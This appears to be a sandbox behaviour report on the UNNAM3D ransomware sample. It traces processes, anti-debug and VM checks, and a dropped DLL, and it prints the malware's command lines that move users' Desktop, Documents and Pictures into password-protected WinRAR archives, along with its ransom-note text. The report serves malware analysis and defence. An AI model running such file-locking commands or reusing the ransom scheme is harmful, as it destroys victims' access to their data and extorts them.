UNNAM3D Ransomware | Sequential Behavior
VTI SCORE: 94/100
Dynamic Analysis Report
Classification: Ransomware, Wiper, Dropper

Remarks (2/2)

(0x200000e): The overall sleep time of all monitored processes was truncated from "31 minutes, 2 seconds" to "40 seconds" to reveal dormant functionality.

(0x2000004): The operating system was rebooted during the analysis because the sample installed a startup script, task or application for persistence.

Remarks

(0x200000c): The maximum memory dump size was exceeded. Some dumps may be missing in the report.

(0x200001f): Code in memory was overwritten during this analysis. Review corresponding VTI for more info.

Monitored Processes

Process Overview
| ID | PID | Monitor Reason | Integrity Level | Image Name | Command Line | Origin ID |
|---|---|---|---|---|---|---|
| #1 | 0x15c | Analysis Target | High (Elevated) | gblyrzexggw.exe | "C:\Users\WhuOXYsD\Desktop\gblyrzexggw.exe" | - |
| #2 | 0x948 | Child Process | High (Elevated) | unnam3d.exe | "C:\Users\WhuOXYsD\AppData\Local\Temp\UNNAM3D.EXE" | #1 |
| #3 | 0x8d4 | Child Process | High (Elevated) | cmd.exe | "C:\Windows\System32\cmd.exe" /C cd C:\Users\WhuOXYsD\Desktop && C:\Users\WhuOXYsD\AppData\Local\Temp\\WinRAR.exe m -r -pMyPassword Desktop * | #2 |
| #4 | 0x8dc | Child Process | High (Elevated) | cmd.exe | "C:\Windows\System32\cmd.exe" /C cd C:\Users\WhuOXYsD\Documents && C:\Users\WhuOXYsD\AppData\Local\Temp\\WinRAR.exe m -r -pMyPassword Documents * | #2 |
| #5 | 0x244 | Child Process | High (Elevated) | cmd.exe | "C:\Windows\System32\cmd.exe" /C cd C:\Users\WhuOXYsD\Pictures && C:\Users\WhuOXYsD\AppData\Local\Temp\\WinRAR.exe m -r -pMyPassword Pictures * | #2 |
| #6 | 0x340 | Child Process | High (Elevated) | winrar.exe | C:\Users\WhuOXYsD\AppData\Local\Temp\\WinRAR.exe m -r -pMyPassword Desktop * | #3 |
| #7 | 0x6ac | Child Process | High (Elevated) | winrar.exe | C:\Users\WhuOXYsD\AppData\Local\Temp\\WinRAR.exe m -r -pMyPassword Pictures * | #5 |
| #8 | 0xa20 | Child Process | High (Elevated) | winrar.exe | C:\Users\WhuOXYsD\AppData\Local\Temp\\WinRAR.exe m -r -pMyPassword Documents * | #4 |
| #9 | 0x730 | Autostart | Medium | unnam3d.exe | "C:\Users\WhuOXYsD\AppData\Local\Temp\UNNAM3D.EXE" | - |

Behavior Information - Sequential View

Process #1: gblyrzexggw.exe
Information Value
ID #1
File Name c:\users\whuoxysd\desktop\gblyrzexggw.exe
Command Line "C:\Users\WhuOXYsD\Desktop\gblyrzexggw.exe"
Initial Working Directory C:\Users\WhuOXYsD\Desktop\
Monitor Start Time: 00:00:13, Reason: Analysis Target
Unmonitor End Time: 00:00:40, Reason: Self Terminated
Monitor Duration 00:00:26
OS Process Information
Information Value
PID 0x15c
Parent PID 0x65c (c:\windows\explorer.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username EGLAFTB1N8YA\WhuOXYsD
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs 0x8E0, 0x8F0, 0x8FC, 0x914, 0x904, 0x8D8, 0x94C, 0x8BC, 0x944, 0xC4, 0x11C
Memory Dumps
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points YARA Actions
agiledotnetrt.dll 0x71C00000 0x721C1FFF Marked Writable - 32-bit - False
agiledotnetrt.dll 0x71C00000 0x721C1FFF Content Changed - 32-bit 0x71F65181 False
agiledotnetrt.dll 0x71C00000 0x721C1FFF Content Changed - 32-bit 0x71D98C14, 0x71C7EBF1, ... False
agiledotnetrt.dll 0x71C00000 0x721C1FFF Content Changed - 32-bit 0x71DFA363 False
agiledotnetrt.dll 0x71C00000 0x721C1FFF Content Changed - 32-bit 0x71E15B00, 0x71E246C7 False
agiledotnetrt.dll 0x71C00000 0x721C1FFF Content Changed - 32-bit 0x71CAF180 False
agiledotnetrt.dll 0x71C00000 0x721C1FFF Content Changed - 32-bit 0x71F7E0BA False
agiledotnetrt.dll 0x71C00000 0x721C1FFF Content Changed - 32-bit 0x71F5C000, 0x71F5BFC7 False
Hook Information
Type Installer Target Size Information Actions
Code agiledotnetrt.dll:+0xfc2e6 ntdll.dll:DbgBreakPoint+0x0 1 bytes -
Code agiledotnetrt.dll:+0x4b698 clrjit.dll:sxsJitStartup+0x1e3bd 4 bytes -
Dropped Files
Filename File Size Hash Values YARA Match Actions
C:\Users\WhuOXYsD\Desktop\gblyrzexggw.exe 7.71 MB MD5: 6ed8c24732529fccf847927c68fc0174
SHA1: c7155a3d2dd0ff0ff2f746b79998a5aabe79735f
SHA256: 567bdc9330d3ff2dfc138fa9f284ebb17a83a5ec0305d846474d7b30cbc36247
SSDeep: 196608:BWvq6ulMDaZkjYTGa44XFcxzkOGXDjD/E:IvXKDk8Sa44XFcxz3GXg
False
C:\Users\WhuOXYsD\AppData\Local\Temp\88044b52-bb1c-4d13-820b-fd46b551698e\AgileDotNetRT.dll 2.10 MB MD5: db956a02daba647f229b01d56ea5d892
SHA1: 1c8d576d60f74b97ac0b7a419fd1ee710bf0ab8f
SHA256: 5b4f5e6cc52df647673b94249e5392e6f00cc5ffb7e1fc7c4219351762618cdd
SSDeep: 49152:tErk8yoNXvvBxlC/ziloFcbhXvmZF4nse2MmnbSUJmrnSloKbS:tErk8y6/Y/nFcVXgesEmOFzSfbS
False
Modified Files
Filename File Size Hash Values YARA Match Actions
c:\users\whuoxysd\appdata\local\gdipfontcachev1.dat 106.27 KB MD5: a998686378c9bc64711f21878acf679d
SHA1: ae0784ba9a7ebe18f56625100c42f3f75c3342be
SHA256: 5f3cdc47addc45a9a6c6bddf8f81f2b52c9ae27947189b1faad3414dc74f5d6b
SSDeep: 768:Ve8mqoSHgTl3hohIqdqdsBzke0A8WitQBsclGYlTF6THsyx2:KqoSHgTl3hA51t0A8WitQBHOHBx2
False
Threads
Thread 0x8e0
Category Operation Information Success Count Logfile
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\88044b52-bb1c-4d13-820b-fd46b551698e\, type = file_attributes False 1
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\88044b52-bb1c-4d13-820b-fd46b551698e, type = file_attributes False 1
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp, type = file_attributes True 1
File Create Directory C:\Users\WhuOXYsD\AppData\Local\Temp\88044b52-bb1c-4d13-820b-fd46b551698e True 1
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\88044b52-bb1c-4d13-820b-fd46b551698e\AgileDotNetRT.dll, type = file_attributes False 1
File Create filename = C:\Users\WhuOXYsD\AppData\Local\Temp\88044b52-bb1c-4d13-820b-fd46b551698e\AgileDotNetRT.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL True 1
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\88044b52-bb1c-4d13-820b-fd46b551698e\AgileDotNetRT.dll, type = file_type True 2
File Write filename = C:\Users\WhuOXYsD\AppData\Local\Temp\88044b52-bb1c-4d13-820b-fd46b551698e\AgileDotNetRT.dll, size = 2197808 True 1
Module Load module_name = C:\Users\WhuOXYsD\AppData\Local\Temp\88044b52-bb1c-4d13-820b-fd46b551698e\AgileDotNetRT.dll, base_address = 0x71c00000 True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x769a0000 True 1
Module Load module_name = user32.dll, base_address = 0x76d60000 True 1
Module Load module_name = advapi32.dll, base_address = 0x771a0000 True 1
Module Load module_name = ntdll.dll, base_address = 0x77de0000 True 1
Module Load module_name = shell32.dll, base_address = 0x75c10000 True 1
Module Load module_name = shlwapi.dll, base_address = 0x77360000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x769b11a9 True 1
Module Get Filename module_name = C:\Users\WhuOXYsD\AppData\Local\Temp\88044b52-bb1c-4d13-820b-fd46b551698e\AgileDotNetRT.dll, process_name = c:\users\whuoxysd\desktop\gblyrzexggw.exe, file_name_orig = C:\Users\WhuOXYsD\AppData\Local\Temp\88044b52-bb1c-4d13-820b-fd46b551698e\AgileDotNetRT.dll, size = 260 True 1
System Get Info type = Operating System True 1
Debug Hide c:\users\whuoxysd\desktop\gblyrzexggw.exe True 1
Debug Check for Presence c:\users\whuoxysd\desktop\gblyrzexggw.exe True 1
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = IsUserAnAdmin, address_out = 0x75c644f5 True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System, value_name = EnableLUA, data = 1 True 1
Debug Check for Presence c:\users\whuoxysd\desktop\gblyrzexggw.exe True 1
Debug Check for Presence c:\users\whuoxysd\desktop\gblyrzexggw.exe False 1
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = NtQuerySystemInformation, address_out = 0x77dffda0 True 1
System Get Info type = SYSTEM_MODULE_INFORMATION True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000 True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000, value_name = DriverDesc, data = 83 True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Hardware\description\System True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Hardware\description\System, value_name = SystemBiosVersion, data = 76 True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Hardware\description\System, value_name = VideoBiosVersion, data = 76 False 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Hardware\description\System, value_name = SystemBiosVersion, data = 76 True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ False 1
Module Get Handle module_name = c:\windows\syswow64\crypt32.dll, base_address = 0x77240000 True 1
Module Get Handle module_name = c:\windows\syswow64\psapi.dll, base_address = 0x76e60000 True 1
Module Get Handle module_name = c:\windows\syswow64\version.dll, base_address = 0x75870000 True 1
Module Get Handle module_name = c:\windows\syswow64\user32.dll, base_address = 0x76d60000 True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x769a0000 True 1
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlAllocateHeap, address_out = 0x77e0e026 True 1
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlLeaveCriticalSection, address_out = 0x77e02270 True 1
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlEnterCriticalSection, address_out = 0x77e022b0 True 1
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlInitializeCriticalSection, address_out = 0x77e12c42 True 1
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlReAllocateHeap, address_out = 0x77e21f6e True 1
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlSizeHeap, address_out = 0x77e13002 True 1
Module Get Address module_name = c:\users\whuoxysd\appdata\local\temp\88044b52-bb1c-4d13-820b-fd46b551698e\agiledotnetrt.dll, function = _Initialize, address_out = 0x71c1142e True 1
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\88044b52-bb1c-4d13-820b-fd46b551698e\, type = file_attributes True 1
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\88044b52-bb1c-4d13-820b-fd46b551698e\AgileDotNetRT.dll, type = file_attributes True 1
Module Load module_name = C:\Users\WhuOXYsD\AppData\Local\Temp\88044b52-bb1c-4d13-820b-fd46b551698e\AgileDotNetRT.dll, base_address = 0x71c00000 True 1
Module Get Address module_name = c:\users\whuoxysd\appdata\local\temp\88044b52-bb1c-4d13-820b-fd46b551698e\agiledotnetrt.dll, function = _Initialize, address_out = 0x71c1142e True 1
Module Load module_name = clrjit.dll, base_address = 0x75260000 True 1
Module Get Address module_name = c:\windows\microsoft.net\framework\v4.0.30319\clrjit.dll, function = getJit, address_out = 0x752af70e True 1
Module Get Filename module_name = c:\windows\microsoft.net\framework\v4.0.30319\clrjit.dll, process_name = c:\users\whuoxysd\desktop\gblyrzexggw.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll, size = 260 True 1
File Create filename = C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll, desired_access = FILE_READ_DATA, share_mode = FILE_SHARE_READ True 1
File Get Info filename = C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll, type = size, size_out = 0 True 1
File Read filename = C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll, size = 510104, size_out = 510104 True 1
Environment Get Environment String name = UKKED False 1
System Get Time type = System Time, time = 2019-04-02 12:03:59 (UTC) True 1
Environment Get Environment String name = UKKED False 1
Module Get Handle module_name = comctl32.dll, base_address = 0x0 False 1
Module Load module_name = comctl32.dll, base_address = 0x75010000 True 1
Module Get Handle module_name = comctl32.dll, base_address = 0x0 False 1
Module Load module_name = comctl32.dll, base_address = 0x74e70000 True 1
Module Get Handle module_name = c:\windows\syswow64\user32.dll, base_address = 0x76d60000 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x77e125dd True 1
Module Get Handle module_name = c:\users\whuoxysd\desktop\gblyrzexggw.exe, base_address = 0x1360000 True 2
Window Create class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Window Set Attribute class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -4, new_long = 2011243997 True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework, value_name = DbgJITDebugLaunchSetting, type = REG_NONE False 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework, value_name = DbgManagedDebugger, type = REG_NONE False 1
Window Set Attribute class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -4, new_long = 19269942 True 1
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x75010000 True 9
Module Load module_name = RichEd20.DLL, base_address = 0x74df0000 True 1
Module Get Filename module_name = RichEd20.DLL, process_name = c:\users\whuoxysd\desktop\gblyrzexggw.exe, file_name_orig = C:\Windows\system32\RichEd20.DLL, size = 260 True 1
File Get Info filename = C:\Windows\system32\RichEd20.DLL, type = file_attributes True 1
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x75010000 True 2
Environment Get Environment String name = UKKED False 4
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x75010000 True 1
Module Get Handle module_name = c:\users\whuoxysd\desktop\gblyrzexggw.exe, base_address = 0x1360000 True 2
Window Create window_name = .NET-BroadcastEventWindow.4.0.0.0.141b42a.0, class_name = .NET-BroadcastEventWindow.4.0.0.0.141b42a.0, wndproc_parameter = 0 True 1
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x75010000 True 1
Environment Get Environment String name = UKKED False 1
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x75010000 True 4
Environment Get Environment String name = UKKED False 1
File Get Info filename = C:\Users\WhuOXYsD\Desktop\gblyrzexggw.exe.config, type = file_attributes False 1
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x75010000 True 6
Module Get Handle module_name = c:\users\whuoxysd\desktop\gblyrzexggw.exe, base_address = 0x1360000 True 2
Window Create window_name = TimerNativeWindow, class_name = WindowsForms10.Window.0.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Window Set Attribute window_name = TimerNativeWindow, class_name = WindowsForms10.Window.0.app.0.141b42a_r14_ad1, index = -4, new_long = 2011243997 True 1
Window Set Attribute window_name = TimerNativeWindow, class_name = WindowsForms10.Window.0.app.0.141b42a_r14_ad1, index = -4, new_long = 19270142 True 1
System Sleep duration = 100 milliseconds (0.100 seconds) True 1
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x75010000 True 2
Environment Get Environment String name = UKKED False 1
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x75010000 True 21
System Get Cursor x_out = 424, y_out = 718 True 1
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x75010000 True 1
System Get Cursor x_out = 424, y_out = 718 True 1
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x75010000 True 30
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll, base_address = 0x74e70000 True 1
System Get Cursor x_out = 424, y_out = 718 True 1
Module Get Handle module_name = c:\users\whuoxysd\desktop\gblyrzexggw.exe, base_address = 0x1360000 True 1
Window Create window_name = UNNAM3D, class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Window Set Attribute window_name = UNNAM3D, class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -4, new_long = 2011243997 True 1
Window Set Attribute window_name = UNNAM3D, class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -4, new_long = 19270870 True 1
Module Get Handle module_name = c:\users\whuoxysd\desktop\gblyrzexggw.exe, base_address = 0x1360000 True 1
Window Create class_name = WindowsForms10.Window.0.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Window Set Attribute class_name = WindowsForms10.Window.0.app.0.141b42a_r14_ad1, index = -4, new_long = 2011243997 True 1
Window Set Attribute class_name = WindowsForms10.Window.0.app.0.141b42a_r14_ad1, index = -4, new_long = 19270910 True 1
Window Set Attribute window_name = UNNAM3D, class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -8, new_long = 393324 False 1
Window Set Attribute window_name = UNNAM3D, class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -8, new_long = 393324 True 1
Keyboard Get Info type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721 True 1
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll, base_address = 0x74e70000 True 1
System Get Cursor x_out = 170, y_out = 368 True 1
Window Set Attribute window_name = UNNAM3D, class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -16, new_long = 33619968 True 1
Window Set Attribute window_name = UNNAM3D, class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -20, new_long = 65536 True 1
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll, base_address = 0x74e70000 True 1
Module Get Handle module_name = c:\users\whuoxysd\desktop\gblyrzexggw.exe, base_address = 0x1360000 True 2
Window Create class_name = WindowsForms10.RichEdit20W.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Window Set Attribute class_name = WindowsForms10.RichEdit20W.app.0.141b42a_r14_ad1, index = -4, new_long = 1960780026 True 1
Window Set Attribute class_name = WindowsForms10.RichEdit20W.app.0.141b42a_r14_ad1, index = -4, new_long = 19270990 True 1
Window Set Attribute class_name = WindowsForms10.RichEdit20W.app.0.141b42a_r14_ad1, index = -12, new_long = 393252 False 1
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll, base_address = 0x74e70000 True 1
Module Get Handle module_name = c:\users\whuoxysd\desktop\gblyrzexggw.exe, base_address = 0x1360000 True 2
Window Create window_name = Locked Files, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Window Set Attribute window_name = Locked Files, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 1961408713 True 1
Window Set Attribute window_name = Locked Files, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 19272414 True 1
Window Set Attribute window_name = Locked Files, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -12, new_long = 393646 False 1
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll, base_address = 0x74e70000 True 1
Module Get Handle module_name = c:\users\whuoxysd\desktop\gblyrzexggw.exe, base_address = 0x1360000 True 1
Window Create class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Window Set Attribute class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -4, new_long = 2011243997 True 1
Window Set Attribute class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -4, new_long = 19272454 True 1
Window Set Attribute class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -12, new_long = 197042 False 1
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll, base_address = 0x74e70000 True 1
Module Get Handle module_name = c:\users\whuoxysd\desktop\gblyrzexggw.exe, base_address = 0x1360000 True 1
Window Create window_name = CREATER: UNNAM3D, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Window Set Attribute window_name = CREATER: UNNAM3D, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 1961408713 True 1
Window Set Attribute window_name = CREATER: UNNAM3D, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 19272494 True 1
Window Set Attribute window_name = CREATER: UNNAM3D, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -12, new_long = 197044 False 1
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll, base_address = 0x74e70000 True 1
Module Get Handle module_name = c:\users\whuoxysd\desktop\gblyrzexggw.exe, base_address = 0x1360000 True 1
Window Create window_name = Discord: UNNAM3D#6666, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Window Set Attribute window_name = Discord: UNNAM3D#6666, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 1961408713 True 1
Window Set Attribute window_name = Discord: UNNAM3D#6666, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 19272534 True 1
Window Set Attribute window_name = Discord: UNNAM3D#6666, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -12, new_long = 197046 False 1
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll, base_address = 0x74e70000 True 1
Module Get Handle module_name = c:\users\whuoxysd\desktop\gblyrzexggw.exe, base_address = 0x1360000 True 1
Window Create window_name = You will need to send an message to the below discord with a $50 amazon giftcard code. Then you will shortley get an message back with a password to unlock your files., class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Window Set Attribute window_name = You will need to send an message to the below discord with a $50 amazon giftcard code. Then you will shortley get an message back with a password to unlock your files., class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 1961408713 True 1
Window Set Attribute window_name = You will need to send an message to the below discord with a $50 amazon giftcard code. Then you will shortley get an message back with a password to unlock your files., class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 19315686 True 1
Window Set Attribute window_name = You will need to send an message to the below discord with a $50 amazon giftcard code. Then you will shortley get an message back with a password to unlock your files., class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -12, new_long = 131514 False 1
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll, base_address = 0x74e70000 True 1
Module Get Handle module_name = c:\users\whuoxysd\desktop\gblyrzexggw.exe, base_address = 0x1360000 True 1
Window Create window_name = All your personal files have been locked and you need to pay a ransom to get them back. You will have 24 hours to pay or the password will be deleted of our servers making it impossible to get your files back. , class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Window Set Attribute window_name = All your personal files have been locked and you need to pay a ransom to get them back. You will have 24 hours to pay or the password will be deleted of our servers making it impossible to get your files back. , class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 1961408713 True 1
Window Set Attribute window_name = All your personal files have been locked and you need to pay a ransom to get them back. You will have 24 hours to pay or the password will be deleted of our servers making it impossible to get your files back. , class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 19315750 True 1
Window Set Attribute window_name = All your personal files have been locked and you need to pay a ransom to get them back. You will have 24 hours to pay or the password will be deleted of our servers making it impossible to get your files back. , class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -12, new_long = 131512 False 1
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll, base_address = 0x74e70000 True 1
Module Get Handle module_name = c:\users\whuoxysd\desktop\gblyrzexggw.exe, base_address = 0x1360000 True 1
Window Create window_name = How do i pay?, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Window Set Attribute window_name = How do i pay?, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 1961408713 True 1
Window Set Attribute window_name = How do i pay?, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 19315790 True 1
Window Set Attribute window_name = How do i pay?, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -12, new_long = 131518 False 1
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll, base_address = 0x74e70000 True 1
Module Get Handle module_name = c:\users\whuoxysd\desktop\gblyrzexggw.exe, base_address = 0x1360000 True 1
Window Create window_name = What Happend?, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Window Set Attribute window_name = What Happend?, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 1961408713 True 1
Window Set Attribute window_name = What Happend?, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 19315830 True 1
Window Set Attribute window_name = What Happend?, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -12, new_long = 131566 False 1
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll, base_address = 0x74e70000 True 1
Module Get Handle module_name = c:\users\whuoxysd\desktop\gblyrzexggw.exe, base_address = 0x1360000 True 1
Window Create window_name = -YOUR FILES HAVE BEEN LOCKED-, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Window Set Attribute window_name = -YOUR FILES HAVE BEEN LOCKED-, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 1961408713 True 1
Window Set Attribute window_name = -YOUR FILES HAVE BEEN LOCKED-, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 19315870 True 1
Window Set Attribute window_name = -YOUR FILES HAVE BEEN LOCKED-, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -12, new_long = 131564 False 1
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll, base_address = 0x74e70000 True 1
Module Get Handle module_name = c:\users\whuoxysd\desktop\gblyrzexggw.exe, base_address = 0x1360000 True 1
Window Create class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Window Set Attribute class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -4, new_long = 2011243997 True 1
